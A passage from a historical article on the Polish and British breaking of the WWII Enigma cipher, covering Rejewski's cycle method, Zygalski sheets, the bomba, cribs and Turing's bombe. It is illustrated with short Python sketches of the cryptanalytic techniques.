anindicator[26]as part of the message preamble. The wordkeywas also used at Bletchley Park to describe the network that used the same Enigma setting sheets. 
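The reciprocal behaviour of the plugboard described above (it is its own inverse) can be modelled as a simple lookup table. The stecker pairs below are hypothetical, apart from the A–G pairing used as the example in the text:

```python
import string

def plugboard(pairs: list[tuple[str, str]]) -> dict[str, str]:
    """Build the plugboard mapping; unplugged letters stay self-steckered."""
    table = {c: c for c in string.ascii_uppercase}
    for a, b in pairs:
        table[a], table[b] = b, a
    return table

pb = plugboard([("A", "G"), ("T", "K")])
assert pb["A"] == "G" and pb["G"] == "A"   # pressing A enters the scrambler at G
assert all(pb[pb[c]] == c for c in pb)     # applying the board twice is the identity
```

This involution property matters later in the story: the plugboard relabels the letters inside Rejewski's cycle groups without changing the number or lengths of the cycles.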
Initially these were recorded using coloured pencils and were given the namesred,light blueetc., and later the names of birds such askestrel.[27]During World War II the settings for most networks lasted for 24 hours, although some were changed more often towards the end of the war.[28]The sheets had columns specifying, for each day of the month, the rotors to be used and their positions, the ring positions and the plugboard connections. For security, the dates were in reverse chronological order down the page, so that each row could be cut off and destroyed when it was finished with.[29] Until 15 September 1938,[31]the transmitting operator indicated to the receiving operator(s) how to set their rotors, by choosing a three-lettermessage key(the key specific to that message) and enciphering it twice using the specified initial ring positions (theGrundstellung). The resultant six-letter indicator was then transmitted before the enciphered text of the message.[32]Suppose that the specifiedGrundstellungwasRAOand the chosen three-letter message key wasIHL; the operator would set the rotors toRAOand encipherIHLtwice. The resultant ciphertext,DQYQQT, would be transmitted, at which point the rotors would be changed to the message key (IHL) and then the message itself enciphered. The receiving operator would use the specifiedGrundstellung RAOto decipher the first six letters, yieldingIHLIHL. On seeing the repeated message key, they would know there had been no corruption and useIHLto decipher the message. The weakness in thisindicator procedurecame from two factors. First, use of a globalGrundstellung; this was changed in September 1938 so that the operator selected his initial position to encrypt the message key, and sent the initial positionin clearfollowed by the enciphered message key. The second problem was the repetition of the message key within the indicator, which was a serious security flaw.[33]The message setting was encoded twice, resulting in a relation between the first and fourth, second and fifth, and third and sixth characters. This weakness enabled thePolish Cipher Bureauto break the pre-war Enigma system as early as 1932. On 1 May 1940 the Germans changed the procedures to encipher the message key only once. In 1927, the UK openly purchased a commercial Enigma. Its operation was analysed and reported. Although a leading British cryptographer,Dilly Knox(a veteran ofWorld War Iand the cryptanalytical activities of the Royal Navy'sRoom 40), worked on decipherment, he had only the messages he generated himself to practice with. After Germany supplied modified commercial machines to theNationalistside in theSpanish Civil War, and with theItalian Navy(who were also aiding the Nationalists) using a version of the commercial Enigma that did not have a plugboard, Britain could intercept the radio broadcast messages. In April 1937[34]Knox made his first decryption of an Enigma encryption using a technique that he calledbuttoning upto discover the rotor wirings[35]and another that he calledroddingto solve messages.[36]This relied heavily oncribsand on a crossword-solver's expertise in Italian, as it yielded a limited number of spaced-out letters at a time. 
Britain had no ability to read the messages broadcast by Germany, which used the military Enigma machine.[37] In the 1920s the German military began using a 3-rotor Enigma, whose security was increased in 1930 by the addition of a plugboard.[38]ThePolish Cipher Bureausought to break it because of the threat that Poland faced from Germany, but the early attempts did not succeed. Mathematicians having earlier rendered great services in breaking Russian ciphers and codes, in early 1929 the Polish Cipher Bureau invited mathematics students at Poznań University – who had a good knowledge of the German language due to the area having belonged to Germany before being awarded to Poland after World War I – to take a course in cryptology.[39] After the course, the Bureau recruited some students to work part-time at a Bureau branch set up in Poznań. On 1 September 1932, 27-year-old mathematicianMarian Rejewskiand two fellowPoznań Universitymathematics graduates,Henryk ZygalskiandJerzy Różycki, were hired by the Bureau in Warsaw.[40]Their first task was reconstructing a four-letter German naval code.[41] Near the end of 1932 Rejewski was asked to work a couple of hours a day at breaking the Enigma cipher. His work on it may have begun in late October or early November 1932.[42] Marian Rejewski quickly spotted the Germans' major procedural weaknesses of specifying a single indicator setting (Grundstellung) for all messages on a network for a day, and repeating the operator's chosenmessage keyin the enciphered 6-letter indicator. Those procedural mistakes allowed Rejewski to decipher the message keys without knowing any of the machine's wirings. In the above example ofDQYQQTbeing the enciphered indicator, it is known that the first letterDand the fourth letterQrepresent the same letter, enciphered three positions apart in the scrambler sequence. Similarly withQandQin the second and fifth positions, andYandTin the third and sixth. Rejewski exploited this fact by collecting a sufficient set of messages enciphered with the same indicator setting, and assembling three tables for the 1,4, the 2,5, and the 3,6 pairings. Each such table recorded, for every first (or second, or third) letter observed in the day's indicators, the fourth (or fifth, or sixth) letter that corresponded to it. A path from one first letter to the corresponding fourth letter, then from that letter as the first letter to its corresponding fourth letter, and so on until the first letter recurs, traces out acycle group.[43]The table in the original example contained six cycle groups. Rejewski recognised that a cycle group must pair with another group of the same length. Even though Rejewski did not know the rotor wirings or the plugboard permutation, the German mistake allowed him to reduce the number of possible substitution ciphers to a small number. For the 1,4 pairing of that example, there are only1×3×9=27possibilities for the substitution ciphers at positions 1 and 4. Rejewski also exploited cipher clerk laziness. Scores of messages would be enciphered by several cipher clerks, but some of those messages would have the same encrypted indicator. That meant that both clerks happened to choose the same three letter starting position. Such a collision should be rare with randomly selected starting positions, but lazy cipher clerks often chose starting positions such as "AAA", "BBB", or "CCC". Those security mistakes allowed Rejewski to solve each of the six permutations used to encipher the indicator. That solution was an extraordinary feat. Rejewski did it without knowing the plugboard permutation or the rotor wirings. 
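The pairing tables and cycle groups described above translate directly into code. The sketch below traces the cycle groups of a 1,4 pairing; since the original table did not survive extraction, the pairing here is a made-up permutation chosen so that its cycle lengths are 9, 9, 3, 3, 1 and 1, the pattern cited later in the text.

```python
import string

def cycle_lengths(pairing: dict[str, str]) -> list[int]:
    """Lengths of the cycle groups of a full 26-letter pairing."""
    seen, lengths = set(), []
    for start in pairing:
        if start in seen:
            continue
        n, cur = 0, start
        while cur not in seen:
            seen.add(cur)
            cur = pairing[cur]
            n += 1
        lengths.append(n)
    return sorted(lengths, reverse=True)

# With enough traffic, pairing[first letter] = fourth letter of each indicator
# covers all 26 letters, e.g. pairing = {ind[0]: ind[3] for ind in indicators}.
pairing = dict(zip(string.ascii_uppercase, "BCDEFGHIAKLMNOPQRJTUSWXVYZ"))
print(cycle_lengths(pairing))  # [9, 9, 3, 3, 1, 1]
```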
Even after solving for the six permutations, Rejewski did not know how the plugboard was set or the positions of the rotors. Knowing the six permutations also did not allow Rejewski to read any messages.

Before Rejewski started work on the Enigma, the French had a spy, Hans-Thilo Schmidt, who worked at Germany's Cipher Office in Berlin and had access to some Enigma documents. Even with the help of those documents, the French did not make progress on breaking the Enigma. The French decided to share the material with their British and Polish allies. In a December 1931 meeting, the French provided Gwido Langer, head of the Polish Cipher Bureau, with copies of some Enigma material. Langer asked the French for more material, and Gustave Bertrand of French Military Intelligence quickly obliged; Bertrand provided additional material in May and September 1932.[44] The documents included two German manuals and two pages of Enigma daily keys.[45][46]

In December 1932, the Bureau provided Rejewski with some German manuals and monthly keys. The material enabled Rejewski to achieve "one of the most important breakthroughs in cryptologic history"[47] by using the theory of permutations and groups to work out the Enigma scrambler wiring.[48][49]

Rejewski could look at a day's cipher traffic and solve for the permutations at the six sequential positions used to encipher the indicator. Since Rejewski had the cipher key for the day, he knew and could factor out the plugboard permutation. He assumed the keyboard permutation was the same as in the commercial Enigma, so he factored that out too. He knew the rotor order, the ring settings, and the starting position. He developed a set of equations that would allow him to solve for the wiring of the rightmost rotor, assuming the two rotors to its left did not move.[50] He attempted to solve the equations, but failed, with inconsistent results. After some thought, he realised that one of his assumptions must be wrong.

Rejewski found that the connections between the military Enigma's keyboard and the entry ring were not, as in the commercial Enigma, in the order of the keys on a German typewriter. He made an inspired correct guess that they were in alphabetical order.[51] Britain's Dilly Knox was astonished when he learned, in July 1939, that the arrangement was so simple.[52][53]

With the new assumption, Rejewski succeeded in solving the wiring of the rightmost rotor. The next month's cipher traffic used a different rotor in the rightmost position, so Rejewski used the same equations to solve for its wiring. With those rotors known, the remaining third rotor and the reflector wiring were determined. Without capturing a single rotor to reverse engineer, Rejewski had determined the logical structure of the machine. The Polish Cipher Bureau then had some Enigma machine replicas made; the replicas were called "Enigma doubles".

The Poles now had the machine's wiring secrets, but they still needed to determine the daily keys for the cipher traffic. They would examine the Enigma traffic and use the method of characteristics to determine the six permutations used for the indicator, and would then use the grill method to determine the rightmost rotor and its position. That search would be complicated by the plugboard permutation, but that permutation only swapped six pairs of letters – not enough to disrupt the search. The grill method also determined the plugboard wiring.
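In modern accounts, the equations Rejewski solved for the rotor wiring are commonly rendered along the following lines; this is a textbook-style reconstruction, not a quotation of his papers.

```latex
% Permutations composed left to right. S = plugboard, H = keyboard-to-entry-ring
% permutation, N = right-hand rotor, P = the cyclic shift A->B->...->Z->A, and
% Q = the combined permutation of the middle rotor, left rotor and reflector,
% assumed stationary while the six indicator letters were enciphered.
\[
  A_i \;=\; S\,H\,P^{\,i}NP^{-i}\;Q\;P^{\,i}N^{-1}P^{-i}\,H^{-1}S^{-1},
  \qquad i = 1,\dots,6 .
\]
% Each observed A_i gives one equation in the unknowns N and Q. With S known
% from the daily key, Q can be eliminated between equations, leaving equations
% in N alone -- solvable once H was guessed to be the identity (alphabetical)
% mapping rather than the typewriter order.
```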
The grill method could also be used to determine the middle and left rotors and their settings (and those tasks were simpler because there was no plugboard to contend with), but the Poles eventually compiled a catalogue of the 3×2×26×26 = 4,056 possible Q permutations (the permutations produced by the reflector and the two leftmost rotors), so they could simply look up the answer. The only remaining secret of the daily key would then be the ring settings, and the Poles attacked that problem with brute force. Most messages would start with the three letters "ANX" (an is German for "to", and the "X" character was used as a space). It might take almost 26×26×26 = 17,576 trials, but that was doable. Once the ring settings were found, the Poles could read the day's traffic.

The Germans made it easy for the Poles in the beginning. The rotor order changed only every quarter, so the Poles did not have to search for the rotor order. Later the Germans changed it every month, but that did not cause much trouble either. Eventually, the Germans would change the rotor order every day, and late in the war (after Poland had been overrun) the rotor order might even be changed during the day.

The Poles kept improving their techniques as the Germans kept improving their security measures. Rejewski realised that, although the letters in the cycle groups were changed by the plugboard, the number and lengths of the cycles were unaffected – in the example above, six cycle groups with lengths of 9, 9, 3, 3, 1, and 1. He described this invariant structure as the characteristic of the indicator setting. There were only 105,456 possible rotor settings.[54][55] The Poles therefore set about creating a card catalogue of these cycle patterns.[56]

The cycle-length method would avoid using the grill. The card catalogue indexed the cycle lengths for all starting positions (except for turnovers that occurred while enciphering an indicator). The day's traffic would be examined to discover the cycles in its permutations, and the card catalogue consulted to find the possible starting positions. There are roughly one million possible cycle-length combinations and only 105,456 starting positions. Having found a starting position, the Poles would use an Enigma double to determine the cycles at that starting position without a plugboard. They would then compare those cycles to the cycles with the (unknown) plugboard, and solve for the plugboard permutation (a simple substitution cipher). Then the Poles could find the remaining secret of the ring settings with the ANX method.
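The lookup that the catalogue enabled can be sketched as follows. The involution(seed) scrambler below is a hypothetical stand-in for an Enigma double (real cycle structures would come from the machine itself), and the catalogue here covers a demonstration-sized 27 settings rather than all 105,456.

```python
# A card catalogue keyed by the "characteristic": the cycle lengths of the
# three indicator permutations, which the plugboard cannot change.
import itertools, random

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

def involution(seed):
    """Hypothetical stand-in for the scrambler at one position: a deterministic,
    fixed-point-free involution derived from the seed string."""
    rng = random.Random(seed)
    letters = list(ALPHABET)
    rng.shuffle(letters)
    perm = {}
    for a, b in zip(letters[0::2], letters[1::2]):
        perm[a], perm[b] = b, a
    return perm

def cycle_lengths(perm):
    seen, lengths = set(), []
    for start in ALPHABET:
        if start not in seen:
            x, n = start, 0
            while x not in seen:
                seen.add(x)
                x, n = perm[x], n + 1
            lengths.append(n)
    return tuple(sorted(lengths))

def characteristic(setting):
    """Cycle lengths of the 1,4 / 2,5 / 3,6 tables at a given indicator setting."""
    sig = []
    for i in (1, 2, 3):
        p, q = involution(setting + str(i)), involution(setting + str(i + 3))
        sig.append(cycle_lengths({p[k]: q[k] for k in ALPHABET}))
    return tuple(sig)

# Build a demonstration-sized catalogue (27 settings instead of all 105,456).
catalogue = {}
for setting in map("".join, itertools.product("ABC", repeat=3)):
    catalogue.setdefault(characteristic(setting), []).append(setting)

# A day's traffic yields a characteristic; the catalogue returns the candidates.
print(catalogue[characteristic("BAC")])
```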
The problem was compiling the large card catalogue. Rejewski, in 1934 or 1935, devised a machine to facilitate making the catalogue and called it a cyclometer. This "comprised two sets of rotors... connected by wires through which electric current could run. Rotor N in the second set was three letters out of phase with respect to rotor N in the first set, whereas rotors L and M in the second set were always set the same way as rotors L and M in the first set".[57] Preparation of this catalogue, using the cyclometer, was, said Rejewski, "laborious and took over a year, but when it was ready, obtaining daily keys was a question of [some fifteen] minutes".[58]

However, on 1 November 1937, the Germans changed the Enigma reflector, necessitating the production of a new catalogue – "a task which [says Rejewski] consumed, on account of our greater experience, probably somewhat less than a year's time".[58]

This characteristics method stopped working for German naval Enigma messages on 1 May 1937, when the indicator procedure was changed to one involving special codebooks (see German Navy 3-rotor Enigma below).[59] Worse still, on 15 September 1938 it stopped working for German Army and Luftwaffe messages, because operators were then required to choose their own Grundstellung (initial rotor setting) for each message. Although German Army message keys would still be double-enciphered, the day's keys would no longer be double-enciphered at the same initial setting, so the characteristic could no longer be found or exploited.

Although the characteristics method no longer worked, the inclusion of the enciphered message key twice gave rise to a phenomenon that the cryptanalyst Henryk Zygalski was able to exploit. Sometimes (in about one message in eight) one of the repeated letters in the message key enciphered to the same letter on both occasions. These occurrences were called samiczki[60] (in English, females – a term later used at Bletchley Park).[61][62]

Only a limited number of scrambler settings would give rise to females, and these would have been identifiable from the card catalogue. If the first six letters of the ciphertext were SZVSIK, this would be termed a 1–4 female; if WHOEHS, a 2–5 female; and if ASWCRW, a 3–6 female. The method was called Netz (from Netzverfahren, "net method"), or the Zygalski sheet method, as it used perforated sheets that he devised, although at Bletchley Park Zygalski's name was not used for security reasons.[63] About ten females from a day's messages were required for success. There was a set of 26 of these sheets for each of the six possible wheel orders. Each sheet was for the left (slowest-moving) rotor. The 51×51 matrices on the sheets represented the 676 possible starting positions of the middle and right rotors. The sheets contained about 1000 holes in the positions in which a female could occur.[64] The set of sheets for that day's messages would be appropriately positioned on top of each other in the perforated sheets apparatus.
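Spotting females in a day's intercepts requires only a short test, illustrated below on the indicator patterns just quoted (plus the DQYQQT of the running example, which happens to contain a 2–5 female).

```python
# A "female": the same letter three places apart in a six-letter indicator,
# i.e. a repeat between positions 1-4, 2-5 or 3-6.
indicators = ["SZVSIK", "WHOEHS", "ASWCRW", "DQYQQT", "PBLKQW"]   # illustrative

for ind in indicators:
    for i in range(3):
        if ind[i] == ind[i + 3]:
            print(f"{ind}: {i + 1}-{i + 4} female")
```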
Rejewski wrote about how the perforated-sheets apparatus was operated:

When the sheets were superposed and moved in the proper sequence and the proper manner with respect to each other, in accordance with a strictly defined program, the number of visible apertures gradually decreased. And, if a sufficient quantity of data was available, there finally remained a single aperture, probably corresponding to the right case, that is, to the solution. From the position of the aperture one could calculate the order of the rotors, the setting of their rings, and, by comparing the letters of the cipher keys with the letters in the machine, likewise permutation S; in other words, the entire cipher key.[65]

The holes in the sheets were painstakingly cut with razor blades, and in the three months before the next major setback, the sets of sheets for only two of the possible six wheel orders had been produced.[66]

After Rejewski's characteristics method became useless, he invented an electro-mechanical device that was dubbed the bomba kryptologiczna, 'cryptologic bomb'. Each machine contained six sets of Enigma rotors, for the six positions of the repeated three-letter key. Like the Zygalski sheet method, the bomba relied on the occurrence of females, but required only three of them instead of the sheet method's roughly ten. Six bomby[67] were constructed, one for each of the then possible wheel orders. Each bomba conducted an exhaustive (brute-force) analysis of the 17,576[68] possible message keys. Rejewski has written about the device:

The bomb method, invented in the autumn of 1938, consisted largely in the automation and acceleration of the process of reconstructing daily keys. Each cryptologic bomb (six were built in Warsaw for the Biuro Szyfrów [Cipher Bureau] before September 1939) essentially constituted an electrically powered aggregate of six Enigmas. It took the place of about one hundred workers and shortened the time for obtaining a key to about two hours.[69]

The cipher message transmitted the Grundstellung in the clear, so when a bomba found a match, it revealed the rotor order, the rotor positions, and the ring settings. The only remaining secret was the plugboard permutation.

On 15 December 1938, the German Army increased the complexity of Enigma enciphering by introducing two additional rotors (IV and V). This increased the number of possible wheel orders from 6 to 60.[70] The Poles could then read only the small minority of messages that used neither of the two new rotors. They did not have the resources to commission 54 more bomby or to produce 58 sets of Zygalski sheets. Other Enigma users received the two new rotors at the same time. However, until 1 July 1939 the Sicherheitsdienst (SD) – the intelligence agency of the SS and the Nazi Party – continued to use its machines in the old way, with the same indicator setting for all messages. This allowed Rejewski to reuse his previous method, and by about the turn of the year he had worked out the wirings of the two new rotors.[70] On 1 January 1939, the Germans increased the number of plugboard connections from between five and eight to between seven and ten, which made other methods of decryption even more difficult.[58]

Rejewski wrote, in a 1979 critique of appendix 1, volume 1 (1979), of the official history of British Intelligence in the Second World War:

we quickly found the [wirings] within the [new rotors], but [their] introduction ... raised the number of possible sequences of [rotors] from 6 to 60 ... and hence also raised tenfold the work of finding the keys. Thus the change was not qualitative but quantitative. We would have had to markedly increase the personnel to operate the bombs, to produce the perforated sheets ... and to manipulate the sheets.[71][72]
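A greatly simplified caricature of the bomba's search, described above, is sketched below: the real machines coupled six scramblers stepped according to the three intercepted indicators, while this stand-in merely filters the 17,576 rotor positions by whether the observed females could occur there. The scrambler function is the same kind of hypothetical seeded involution as in the earlier sketches, not a real Enigma.

```python
# Brute-force filter over all 26^3 rotor positions: keep only those at which
# the observed females (repeats between indicator positions i and i+3) are
# possible, i.e. the product of the two scrambler permutations has a fixed
# point. This property survives the plugboard, as the Poles exploited.
import itertools, random

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

def scrambler(setting, offset):
    """Hypothetical stand-in for the scrambler permutation 'offset' letters
    past a rotor setting: a deterministic, fixed-point-free involution."""
    rng = random.Random(setting + str(offset))
    letters = list(ALPHABET)
    rng.shuffle(letters)
    perm = {}
    for a, b in zip(letters[0::2], letters[1::2]):
        perm[a], perm[b] = b, a
    return perm

def female_possible(setting, i):
    """Can some message-key letter encipher identically at positions i and i+3?"""
    p, q = scrambler(setting, i), scrambler(setting, i + 3)
    return any(p[k] == q[k] for k in ALPHABET)

observed = [1, 2, 3]    # say females were seen in the 1-4, 2-5 and 3-6 positions

survivors = [s for s in map("".join, itertools.product(ALPHABET, repeat=3))
             if all(female_possible(s, i) for i in observed)]
print(f"{len(survivors)} of 17,576 rotor positions remain to be tested")
```

With only the existence of females as a constraint the filter is weak; the real bomby also used which letters repeated, which narrowed the field far more sharply.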
As the likelihood of war increased in 1939, Britain and France pledged support for Poland in the event of action that threatened its independence.[73] In April, Germany withdrew from the German–Polish Non-Aggression Pact of January 1934. The Polish General Staff, realising what was likely to happen, decided to share their work on Enigma decryption with their western allies. Marian Rejewski later wrote:

[I]t was not [as Harry Hinsley suggested, cryptological] difficulties of ours that prompted us to work with the British and French, but only the deteriorating political situation. If we had had no difficulties at all we would still, or even the more so, have shared our achievements with our allies as our contribution to the struggle against Germany.[71][74]

At a conference near Warsaw on 26 and 27 July 1939, the Poles revealed to the French and British that they had broken Enigma, and pledged to give each a Polish-reconstructed Enigma, along with details of their Enigma-solving techniques and equipment, including Zygalski's perforated sheets and Rejewski's cryptologic bomb.[75] In return, the British pledged to prepare two full sets of Zygalski sheets for all 60 possible wheel orders.[76] Dilly Knox was a member of the British delegation. He commented on the fragility of the Polish system's reliance on the repetition in the indicator, because it might "at any moment be cancelled".[77] In August, two Polish Enigma doubles were sent to Paris, whence Gustave Bertrand took one to London, handing it to Stewart Menzies of Britain's Secret Intelligence Service at Victoria Station.[78]

Gordon Welchman, who became head of Hut 6 at Bletchley Park, wrote:

Hut 6 Ultra would never have gotten off the ground if we had not learned from the Poles, in the nick of time, the details both of the German military version of the commercial Enigma machine, and of the operating procedures that were in use.[79]

Peter Calvocoressi, who became head of the Luftwaffe section in Hut 3, wrote of the Polish contribution:

The one moot point is – how valuable? According to the best qualified judges it accelerated the breaking of Enigma by perhaps a year. The British did not adopt Polish techniques but they were enlightened by them.[80]

On 5 September 1939 the Cipher Bureau began preparations to evacuate key personnel and equipment from Warsaw. Soon a special evacuation train, the Echelon F, transported them eastward, then south. By the time the Cipher Bureau was ordered to cross the border into allied Romania on 17 September, they had destroyed all sensitive documents and equipment and were down to a single very crowded truck. The vehicle was confiscated at the border by a Romanian officer, who separated the military from the civilian personnel. Taking advantage of the confusion, the three mathematicians ignored the Romanian's instructions. They anticipated that in an internment camp they might be identified by the Romanian security police, in which the German Abwehr and SD had informers.[81] The mathematicians went to the nearest railroad station, exchanged money, bought tickets, and boarded the first train headed south. After a dozen or so hours, they reached Bucharest, at the other end of Romania. There they went to the British embassy. Told by the British to "come back in a few days", they next tried the French embassy, introducing themselves as "friends of Bolek" (Bertrand's Polish code name) and asking to speak with a French military officer.
A French Army colonel telephoned Paris and then issued instructions for the three Poles to be assisted in evacuating to Paris.[81] On 20 October 1939, at PC Bruno outside Paris, the Polish cryptologists resumed work on German Enigma ciphers, in collaboration with Bletchley Park.[82]

PC Bruno and Bletchley Park worked together closely, communicating via a telegraph line secured by the use of Enigma doubles. In January 1940 Alan Turing spent several days at PC Bruno conferring with his Polish colleagues. He had brought the Poles a full set of Zygalski sheets that had been punched at Bletchley Park by John Jeffreys using Polish-supplied information, and on 17 January 1940, the Poles made the first break into wartime Enigma traffic – that from 28 October 1939.[83] From that time, until the Fall of France in June 1940, 17 per cent of the Enigma keys found by the Allies were solved at PC Bruno.[84]

Just before opening their 10 May 1940 offensive against the Low Countries and France, the Germans made the feared change in the indicator procedure, discontinuing the duplication of the enciphered message key. This meant that the Zygalski sheet method no longer worked.[85][86] Instead, the cryptanalysts had to rely on exploiting the operator weaknesses described below, particularly the cillies and the Herivel tip.

After the June Franco-German armistice, the Polish cryptological team resumed work in France's southern Free Zone,[87] although probably not on Enigma.[88] Marian Rejewski and Henryk Zygalski, after many travails, perilous journeys, and Spanish imprisonment, finally made it to Britain,[89] where they were inducted into the Polish Army and put to work breaking German SS and SD hand ciphers at a Polish signals facility in Boxmoor. Because they had been in occupied France, it was thought too risky to invite them to work at Bletchley Park.[90] After the German occupation of Vichy France, several of those who had worked at PC Bruno were captured by the Germans. Despite the dire circumstances in which some of them were held, none betrayed the secret of Enigma's decryption.[91]

Apart from some less-than-ideal inherent characteristics of the Enigma, in practice the system's greatest weakness was the sheer volume of messages and some of the ways in which Enigma was used. The basic principle of this sort of enciphering machine is that it should deliver a stream of transformations that are difficult for a cryptanalyst to predict. Some of the instructions to operators, and operator sloppiness, had the opposite effect. Without these operating shortcomings, Enigma would almost certainly not have been broken.[92] The shortcomings that Allied cryptanalysts exploited included, among others, the cillies and the Herivel tip mentioned above. Other useful shortcomings were discovered by the British, and later the American, cryptanalysts, many of which depended on the frequent solving of a particular network.

Mavis Lever, a member of Dilly Knox's team, recalled an occasion when there was an unusual message, from the Italian Navy, whose exploitation led to the British victory at the Battle of Cape Matapan:

The one snag with Enigma of course is the fact that if you press A, you can get every other letter but A. I picked up this message and – one was so used to looking at things and making instant decisions – I thought: 'Something's gone. What has this chap done? There is not a single L in this message.' My chap had been told to send out a dummy message and he had just had a fag [cigarette] and pressed the last key on the keyboard, the L. So that was the only letter that didn't come out.
We had got the biggest crib we ever had, the encypherment was LLLL, right through the message and that gave us the new wiring for the wheel [rotor]. That's the sort of thing we were trained to do. Instinctively look for something that had gone wrong or someone who had done something silly and torn up the rule book.[106]

Postwar debriefings of German cryptographic specialists, conducted as part of project TICOM, tend to support the view that the Germans were well aware that the un-steckered Enigma was theoretically solvable, but thought that the steckered Enigma had not been solved.[4]

The term crib was used at Bletchley Park to denote any known plaintext or suspected plaintext at some point in an enciphered message. Britain's Government Code and Cypher School (GC&CS), before its move to Bletchley Park, had realised the value of recruiting mathematicians and logicians to work in codebreaking teams. Alan Turing, a Cambridge University mathematician with an interest in cryptology and in machines for implementing logical operations – and who was regarded by many as a genius – had started work for GC&CS on a part-time basis from about the time of the Munich Crisis in 1938.[107] Gordon Welchman, another Cambridge mathematician, had also received initial training in 1938,[108] and they both reported to Bletchley Park on 4 September 1939, the day after Britain declared war on Germany.

Most of the Polish success had relied on the repetition within the indicator. But as soon as Turing moved to Bletchley Park – where he initially joined Dilly Knox in the research section – he set about seeking methods that did not rely on this weakness, correctly anticipating that the German Army and Air Force might follow the German Navy in improving their indicator system.

The Poles had used an early form of crib-based decryption in the days when only six leads were used on the plugboard.[59] The technique became known as the Forty Weepy Weepy method for the following reason. When a message was a continuation of a previous one, the plaintext would start with FORT (from Fortsetzung, meaning "continuation"), followed by the time of the first message given twice, bracketed by the letter Y. At this time numerals were represented by the letters on the top row of the Enigma keyboard, so "continuation of message sent at 2330" was represented as FORTYWEEPYYWEEPY.
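The numeral convention behind such cribs is easily mechanised; the sketch below reconstructs the Forty Weepy Weepy plaintext for a continuation of a message sent at 2330.

```python
# Digits were sent using the top keyboard row: Q W E R T Z U I O P stood for
# 1 2 3 4 5 6 7 8 9 0, and the time of origin was given twice, bracketed by Y.
TOP_ROW = dict(zip("1234567890", "QWERTZUIOP"))

def forty_weepy(time_of_origin):
    coded = "".join(TOP_ROW[d] for d in time_of_origin)
    return "FORT" + "Y" + coded + "YY" + coded + "Y"

print(forty_weepy("2330"))   # -> FORTYWEEPYYWEEPY
```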
Cribs were fundamental to the British approach to solving Enigma keys, but guessing the plaintext for a message was a highly skilled business. So in 1940 Stuart Milner-Barry set up a special Crib Room in Hut 8.[109][110] Foremost among the knowledge needed for identifying cribs was the text of previous decrypts. Bletchley Park maintained detailed indexes[111] of message preambles, of every person, of every ship, of every unit, of every weapon, of every technical term, and of repeated phrases such as forms of address and other German military jargon.[112] For each message the traffic analysis recorded the radio frequency, the date and time of intercept, and the preamble – which contained the network-identifying discriminant, the time of origin of the message, the callsigns of the originating and receiving stations, and the indicator setting. This allowed cross-referencing of a new message with a previous one.[113] Thus, as Derek Taunt, another Cambridge mathematician-cryptanalyst, wrote, the truism that "nothing succeeds like success" is particularly apposite here.[100]

Stereotypical messages included Keine besonderen Ereignisse (literally, "no special occurrences" – perhaps better translated as "nothing to report"),[114] An die Gruppe ("to the group")[115] and a number that came from weather stations, such as weub null seqs null null ("weather survey 0600"). This was actually rendered as WEUBYYNULLSEQSNULLNULL: WEUB was short for Wetterübersicht, YY was used as a separator, and SEQS was the common abbreviation of sechs (German for "six").[116] As another example, Field Marshal Erwin Rommel's quartermaster started all of his messages to his commander with the same formal introduction.[117]

With a combination of a probable plaintext fragment and the fact that no letter could be enciphered as itself, a corresponding ciphertext fragment could often be tested by trying every possible alignment of the crib against the ciphertext, a procedure known as crib-dragging. This, however, was only one aspect of the process of solving a key. Derek Taunt has written that the three cardinal personal qualities in demand for cryptanalysis were (1) a creative imagination, (2) a well-developed critical faculty, and (3) a habit of meticulousness.[118] Skill at solving crossword puzzles was famously tested in recruiting some cryptanalysts, and was useful in working out plugboard settings when a possible solution was being examined. For example, if the crib was the word WETTER (German for "weather") and a possible decrypt before the plugboard settings had been discovered was TEWWER, it is easy to see that T and W are stecker partners.[119] These examples, although illustrative of the principles, greatly over-simplify the cryptanalysts' tasks.
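Crib-dragging itself is mechanical, as the sketch below shows: slide the crib along the ciphertext and discard every alignment at which any letter would have enciphered to itself. The intercept string here is illustrative, not historical.

```python
def drag(crib, ciphertext):
    """Offsets at which the crib could sit: Enigma never maps a letter to
    itself, so any alignment with a matching letter is impossible."""
    return [i for i in range(len(ciphertext) - len(crib) + 1)
            if all(c != ciphertext[i + j] for j, c in enumerate(crib))]

intercept = "NIBLFMYMLLUFWCASCSSNVHAZ"     # illustrative, not a real intercept
print(drag("WETTER", intercept))           # candidate alignments to test further
```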
A fruitful source of cribs was re-encipherments of messages that had previously been decrypted, either from a lower-level manual cipher or from another Enigma network.[120] This was called a kiss, and happened particularly with German naval messages being sent in the dockyard cipher and repeated verbatim in an Enigma cipher. One German agent in Britain, Nathalie Sergueiew, code-named Treasure, who had been 'turned' to work for the Allies, was very verbose in her messages back to Germany, which were then re-transmitted on the Abwehr Enigma network. She was kept going by MI5 because this provided long cribs, not because of her usefulness as an agent for feeding incorrect information to the Abwehr.[121]

Occasionally, when there was a particularly urgent need to solve German naval Enigma keys, such as when an Arctic convoy was about to depart, mines would be laid by the RAF in a defined position whose grid reference in the German naval system did not contain any of the words (such as sechs or sieben) for which abbreviations or alternatives were sometimes used.[122] The warning message about the mines, and then the "all clear" message, would be transmitted both using the dockyard cipher and on the U-boat Enigma network. This process of planting a crib was called gardening.[123]

Although cillies were not actually cribs, the chit-chat in clear that Enigma operators indulged in among themselves often gave a clue as to the cillies that they might generate.[124]

When captured German Enigma operators revealed that they had been instructed to encipher numbers by spelling them out rather than using the top row of the keyboard, Alan Turing reviewed decrypted messages and determined that the word eins ("one") appeared in 90% of messages.[citation needed] Turing automated the crib process, creating the Eins Catalogue, which assumed that eins was encoded at all positions in the plaintext. The catalogue included every possible rotor position for EINS with that day's wheel order and plugboard connections.[125]

The British bombe was an electromechanical device designed by Alan Turing soon after he arrived at Bletchley Park in September 1939. Harold "Doc" Keen of the British Tabulating Machine Company (BTM) in Letchworth (35 kilometres (22 mi) from Bletchley) was the engineer who turned Turing's ideas into a working machine, under the codename CANTAB.[126] Turing's specification developed the ideas of the Poles' bomba kryptologiczna, but was designed for the much more general crib-based decryption.

The bombe helped to identify the wheel order, the initial positions of the rotor cores, and the stecker partner of a specified letter. This was achieved by examining all 17,576 possible scrambler positions for a set of wheel orders on a comparison between a crib and the ciphertext, so as to eliminate possibilities that contradicted the Enigma's known characteristics. In the words of Gordon Welchman, "the task of the bombe was simply to reduce the assumptions of wheel order and scrambler positions that required 'further analysis' to a manageable number".[110]

